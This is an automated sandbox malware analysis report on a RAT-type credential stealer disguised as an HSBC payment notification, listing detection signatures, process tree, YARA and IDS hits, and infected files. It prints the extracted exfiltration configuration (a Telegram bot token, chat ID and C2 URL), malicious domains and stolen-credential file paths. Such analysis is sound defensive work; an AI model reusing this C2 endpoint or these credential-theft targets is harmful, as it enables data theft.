Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe

Overview

General Information

Sample name:HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe
Analysis ID:1572492
MD5:999146408efd1a704966ca4c1c8ce4b7
SHA1:0dc0a9373154d562c47c04d27977f483d385ea1b
SHA256:a36f4ee96ff62eee2a503838850d7dce90aabc36a704b742b6814f187618f3c1
Tags:exeuser-lowmal3
Infos:

Detection

MassLogger RAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected MassLogger RAT
Yara detected Telegram RAT
.NET source code references suspicious native API functions
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Contains functionality to behave differently if execute on a Russian/Kazak computer
Contains functionality to log keystrokes (.Net Source)
Creates files inside the volume driver (system volume information)
Drops executable to a common third party application directory
Found direct / indirect Syscall (likely to bypass EDR)
Found evasive API chain (may stop execution after checking computer name)
Found evasive API chain (may stop execution after checking volume information)
Infects executable files (exe, dll, sys, html)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Binary contains a suspicious time stamp
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates processes with suspicious names
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Enables driver privileges
Enables security privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain checking for process token information
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Queries time zone information
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe (PID: 3232 cmdline: "C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe" MD5: 999146408EFD1A704966CA4C1C8CE4B7)
    • RegSvcs.exe (PID: 2724 cmdline: "C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • armsvc.exe (PID: 6336 cmdline: "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe" MD5: 423F1F6668442F29DF26625C3F1F2479)
  • alg.exe (PID: 1412 cmdline: C:\Windows\System32\alg.exe MD5: 463F7F1E3383EFC2DF1C247DF13BE675)
  • FXSSVC.exe (PID: 7492 cmdline: C:\Windows\system32\fxssvc.exe MD5: 5DA3CAFF7B6DB6ED124E5F9690E7B126)
  • elevation_service.exe (PID: 7572 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe" MD5: 0B79C87888F1F817B9EF1809AC8DC7F0)
  • maintenanceservice.exe (PID: 7616 cmdline: "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe" MD5: 680DFBE855D22EE0570837F07CDC45D4)
  • msdtc.exe (PID: 7648 cmdline: C:\Windows\System32\msdtc.exe MD5: 51874DD725C538D547DFE65FED3A93E2)
  • PerceptionSimulationService.exe (PID: 7756 cmdline: C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe MD5: 55154595EBC76876D16839386F302C81)
  • perfhost.exe (PID: 7832 cmdline: C:\Windows\SysWow64\perfhost.exe MD5: 436D2153822038C49A041E9D657F7E2D)
  • Locator.exe (PID: 7888 cmdline: C:\Windows\system32\locator.exe MD5: E30FA2BCFDF4D20217D89B9395BE104F)
  • SensorDataService.exe (PID: 7952 cmdline: C:\Windows\System32\SensorDataService.exe MD5: 138460F80D6D680988322149C0DA8337)
  • snmptrap.exe (PID: 8012 cmdline: C:\Windows\System32\snmptrap.exe MD5: 772AEFCF949CAADFB515863053AC8C10)
  • Spectrum.exe (PID: 8080 cmdline: C:\Windows\system32\spectrum.exe MD5: A5C5CBD638C50F62E6B1C909D40EA394)
  • ssh-agent.exe (PID: 4540 cmdline: C:\Windows\System32\OpenSSH\ssh-agent.exe MD5: 56CCD164B03367A0F39A8360E82CB3D1)
  • TieringEngineService.exe (PID: 1416 cmdline: C:\Windows\system32\TieringEngineService.exe MD5: 978A54C9D759FF632658D6B5D6F278B3)
  • AgentService.exe (PID: 7524 cmdline: C:\Windows\system32\AgentService.exe MD5: 7CFA6C3EAA73B924E9F391CE7ED6CFFF)
  • vds.exe (PID: 1660 cmdline: C:\Windows\System32\vds.exe MD5: 9B69326495A6A2E148AF298DBBFA354E)
  • wbengine.exe (PID: 7644 cmdline: "C:\Windows\system32\wbengine.exe" MD5: A4B1E47A80405B400B4460F9F65BA8E2)
  • cleanup

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot7471415635:AAEA2wRbrQkd9OwoRD_hL1tDceuiErS34CY/sendMessage"}

Threatname: MassLogger

{"EXfil Mode": "Telegram", "Telegram Token": "7471415635:AAEA2wRbrQkd9OwoRD_hL1tDceuiErS34CY", "Telegram Chatid": "1613755033"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.1347642495.0000000003E70000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
    00000000.00000002.1347642495.0000000003E70000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000000.00000002.1347642495.0000000003E70000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        00000000.00000002.1347642495.0000000003E70000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
        • 0xf173:$a1: get_encryptedPassword
        • 0xf49b:$a2: get_encryptedUsername
        • 0xef0e:$a3: get_timePasswordChanged
        • 0xf02f:$a4: get_passwordField
        • 0xf189:$a5: set_encryptedPassword
        • 0x10ae5:$a7: get_logins
        • 0x10796:$a8: GetOutlookPasswords
        • 0x10588:$a9: StartKeylogger
        • 0x10a35:$a10: KeyLoggerEventArgs
        • 0x105e5:$a11: KeyLoggerEventArgsEventHandler
        00000000.00000002.1347642495.0000000003E70000.00000004.00001000.00020000.00000000.sdmpMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
        • 0x14125:$a2: \Comodo\Dragon\User Data\Default\Login Data
        • 0x13623:$a3: \Google\Chrome\User Data\Default\Login Data
        • 0x13931:$a4: \Orbitum\User Data\Default\Login Data
        • 0x14729:$a5: \Kometa\User Data\Default\Login Data
        Click to see the 15 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        5.2.RegSvcs.exe.400000.0.unpackJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
          5.2.RegSvcs.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            5.2.RegSvcs.exe.400000.0.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
              5.2.RegSvcs.exe.400000.0.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
              • 0xf173:$a1: get_encryptedPassword
              • 0xf49b:$a2: get_encryptedUsername
              • 0xef0e:$a3: get_timePasswordChanged
              • 0xf02f:$a4: get_passwordField
              • 0xf189:$a5: set_encryptedPassword
              • 0x10ae5:$a7: get_logins
              • 0x10796:$a8: GetOutlookPasswords
              • 0x10588:$a9: StartKeylogger
              • 0x10a35:$a10: KeyLoggerEventArgs
              • 0x105e5:$a11: KeyLoggerEventArgsEventHandler
              5.2.RegSvcs.exe.400000.0.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
              • 0x14125:$a2: \Comodo\Dragon\User Data\Default\Login Data
              • 0x13623:$a3: \Google\Chrome\User Data\Default\Login Data
              • 0x13931:$a4: \Orbitum\User Data\Default\Login Data
              • 0x14729:$a5: \Kometa\User Data\Default\Login Data
              Click to see the 8 entries

              Sigma Signatures

              No Sigma rule has matched

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-10T16:24:28.998498+010020516491A Network Trojan was detected192.168.2.7638921.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-10T16:24:22.340004+010020516481A Network Trojan was detected192.168.2.7642981.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-10T16:24:14.594215+010020181411A Network Trojan was detected54.244.188.17780192.168.2.749702TCP
              2024-12-10T16:24:17.429865+010020181411A Network Trojan was detected18.141.10.10780192.168.2.749709TCP
              2024-12-10T16:24:22.325560+010020181411A Network Trojan was detected44.221.84.10580192.168.2.749727TCP
              2024-12-10T16:26:07.491789+010020181411A Network Trojan was detected47.129.31.21280192.168.2.749966TCP
              2024-12-10T16:26:10.308197+010020181411A Network Trojan was detected13.251.16.15080192.168.2.749972TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-10T16:24:14.594215+010020377711A Network Trojan was detected54.244.188.17780192.168.2.749702TCP
              2024-12-10T16:24:17.429865+010020377711A Network Trojan was detected18.141.10.10780192.168.2.749709TCP
              2024-12-10T16:24:22.325560+010020377711A Network Trojan was detected44.221.84.10580192.168.2.749727TCP
              2024-12-10T16:26:07.491789+010020377711A Network Trojan was detected47.129.31.21280192.168.2.749966TCP
              2024-12-10T16:26:10.308197+010020377711A Network Trojan was detected13.251.16.15080192.168.2.749972TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-10T16:24:26.952913+010020577441Malware Command and Control Activity Detected192.168.2.749736149.154.167.220443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-10T16:24:16.280523+010028032742Potentially Bad Traffic192.168.2.749708193.122.6.16880TCP
              2024-12-10T16:24:24.389865+010028032742Potentially Bad Traffic192.168.2.749708193.122.6.16880TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-10T16:24:19.430559+010028508511Malware Command and Control Activity Detected192.168.2.74971654.244.188.17780TCP
              2024-12-10T16:25:41.188310+010028508511Malware Command and Control Activity Detected192.168.2.74987282.112.184.19780TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus / Scanner detection for submitted sample
              Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeAvira: detected
              Antivirus detection for URL or domain
              Source: http://ww99.przvgke.biz/KAvira URL Cloud: Label: malware
              Source: http://ww12.przvgke.biz/opymuwnb?usid=26&utid=9416579686Avira URL Cloud: Label: malware
              Source: http://ww99.przvgke.biz/opymuwnbAvira URL Cloud: Label: malware
              Source: http://ww12.przvgke.biz/?ts=fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQwNjZ8fHx8fHw2NzU4NWQyYmRmAvira URL Cloud: Label: malware
              Source: http://ww12.przvgke.biz/Avira URL Cloud: Label: malware
              Antivirus detection for dropped file
              Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeAvira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeAvira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeAvira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exeAvira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exeAvira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeAvira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeAvira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeAvira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeAvira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeAvira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeAvira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeAvira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.134\117.0.5938.134_117.0.5938.132_chrome_updater.exeAvira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeAvira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exeAvira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exeAvira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exeAvira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeAvira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeAvira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.134\117.0.5938.134_117.0.5938.132_chrome_updater.exeAvira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exeAvira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exeAvira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeAvira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeAvira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeAvira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeAvira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeAvira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeAvira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\AutoIt3\Au3Info.exeAvira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\AutoIt3\Au3Check.exeAvira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeAvira: detection malicious, Label: W32/Infector.Gen
              Found malware configuration
              Source: 00000005.00000002.2636185001.000000000289B000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: MassLogger {"EXfil Mode": "Telegram", "Telegram Token": "7471415635:AAEA2wRbrQkd9OwoRD_hL1tDceuiErS34CY", "Telegram Chatid": "1613755033"}
              Source: RegSvcs.exe.2724.5.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7471415635:AAEA2wRbrQkd9OwoRD_hL1tDceuiErS34CY/sendMessage"}
              Multi AV Scanner detection for submitted file
              Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeReversingLabs: Detection: 78%
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Machine Learning detection for dropped file
              Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJoe Sandbox ML: detected
              Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJoe Sandbox ML: detected
              Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeJoe Sandbox ML: detected
              Source: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exeJoe Sandbox ML: detected
              Source: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exeJoe Sandbox ML: detected
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJoe Sandbox ML: detected
              Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJoe Sandbox ML: detected
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJoe Sandbox ML: detected
              Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJoe Sandbox ML: detected
              Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJoe Sandbox ML: detected
              Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeJoe Sandbox ML: detected
              Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJoe Sandbox ML: detected
              Source: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.134\117.0.5938.134_117.0.5938.132_chrome_updater.exeJoe Sandbox ML: detected
              Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeJoe Sandbox ML: detected
              Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exeJoe Sandbox ML: detected
              Source: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exeJoe Sandbox ML: detected
              Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exeJoe Sandbox ML: detected
              Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJoe Sandbox ML: detected
              Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeJoe Sandbox ML: detected
              Source: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.134\117.0.5938.134_117.0.5938.132_chrome_updater.exeJoe Sandbox ML: detected
              Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exeJoe Sandbox ML: detected
              Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exeJoe Sandbox ML: detected
              Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJoe Sandbox ML: detected
              Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeJoe Sandbox ML: detected
              Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeJoe Sandbox ML: detected
              Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJoe Sandbox ML: detected
              Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJoe Sandbox ML: detected
              Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJoe Sandbox ML: detected
              Source: C:\Program Files (x86)\AutoIt3\Au3Info.exeJoe Sandbox ML: detected
              Source: C:\Program Files (x86)\AutoIt3\Au3Check.exeJoe Sandbox ML: detected
              Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeJoe Sandbox ML: detected
              Machine Learning detection for sample
              Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeJoe Sandbox ML: detected

              Location Tracking

              barindex
              Tries to detect the country of the analysis system (by using the IP)
              Source: unknownDNS query: name: reallyfreegeoip.org
              Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.7:49715 version: TLS 1.0
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49736 version: TLS 1.2
              Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb77.GCTL source: armsvc.exe, 00000004.00000003.1923223807.0000000000930000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000003.1312938919.0000000003DD0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdb source: armsvc.exe, 00000004.00000003.1979488367.0000000000930000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000004.00000003.2001927405.0000000000700000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000004.00000003.1983124176.0000000000930000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: msiexec.pdb source: armsvc.exe, 00000004.00000003.1396239663.00000000020E0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb source: armsvc.exe, 00000004.00000003.1613322674.0000000001F90000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: ssh-agent.pdb source: armsvc.exe, 00000004.00000003.1495681450.0000000002000000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb444 source: armsvc.exe, 00000004.00000003.1730926356.0000000001F90000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb source: armsvc.exe, 00000004.00000003.1730926356.0000000001F90000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: msiexec.pdbGCTL source: armsvc.exe, 00000004.00000003.1396239663.00000000020E0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: ADelRCP_Exec.pdb source: armsvc.exe, 00000004.00000003.1747463030.0000000001F90000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: mavinject32.pdbGCTL source: armsvc.exe, 00000004.00000003.2045470839.00000000009D0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000004.00000003.2048639803.00000000009B0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: PresentationFontCache.pdb source: armsvc.exe, 00000004.00000003.1358380690.0000000002000000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: PerceptionSimulationService.pdb source: armsvc.exe, 00000004.00000003.1417715785.00000000020D0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000003.1332580741.0000000004890000.00000004.00001000.00020000.00000000.sdmp, HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000003.1327392894.00000000046F0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdb source: armsvc.exe, 00000004.00000003.1652725988.0000000001F90000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: MsSense.pdbGCTL source: armsvc.exe, 00000004.00000003.1442209675.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdbAAAGCTL source: armsvc.exe, 00000004.00000003.1917141745.0000000000700000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: MsSense.pdb source: armsvc.exe, 00000004.00000003.1442209675.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdb source: armsvc.exe, 00000004.00000003.2033255975.0000000000930000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb source: armsvc.exe, 00000004.00000003.1930594845.0000000000930000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000004.00000003.1938936279.0000000000700000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: WmiApSrv.pdbGCTL source: armsvc.exe, 00000004.00000003.1547399003.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb888 source: armsvc.exe, 00000004.00000003.1790951531.0000000002010000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: Acrobat_SL.pdb((( source: armsvc.exe, 00000004.00000003.1621983603.0000000001F90000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: locator.pdb source: armsvc.exe, 00000004.00000003.1434957470.0000000001F70000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000004.00000003.1428827763.0000000002000000.00000004.00001000.00020000.00000000.sdmp, Locator.exe.4.dr
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\AdobeCollabSync.pdb# source: AdobeCollabSync.exe.4.dr
              Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdbGCTL source: armsvc.exe, 00000004.00000003.1348039233.0000000002080000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: ADelRCP_Exec.pdbCC9 source: armsvc.exe, 00000004.00000003.1747463030.0000000001F90000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: vds.pdb source: vds.exe.4.dr
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdb source: armsvc.exe, 00000004.00000003.1634257256.0000000001F90000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\unpackexe\unpack200.pdb00 source: unpack200.exe.4.dr
              Source: Binary string: Acrobat_SL.pdb source: armsvc.exe, 00000004.00000003.1621983603.0000000001F90000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdbU source: armsvc.exe, 00000004.00000003.1979488367.0000000000930000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000004.00000003.2001927405.0000000000700000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000004.00000003.1983124176.0000000000930000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\java_objs\java.pdb source: java.exe.4.dr
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdbT source: armsvc.exe, 00000004.00000003.1652725988.0000000001F90000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdbGG source: armsvc.exe, 00000004.00000003.1821282243.0000000002010000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb))) source: armsvc.exe, 00000004.00000003.1613322674.0000000001F90000.00000004.00001000.00020000.00000000.sdmp
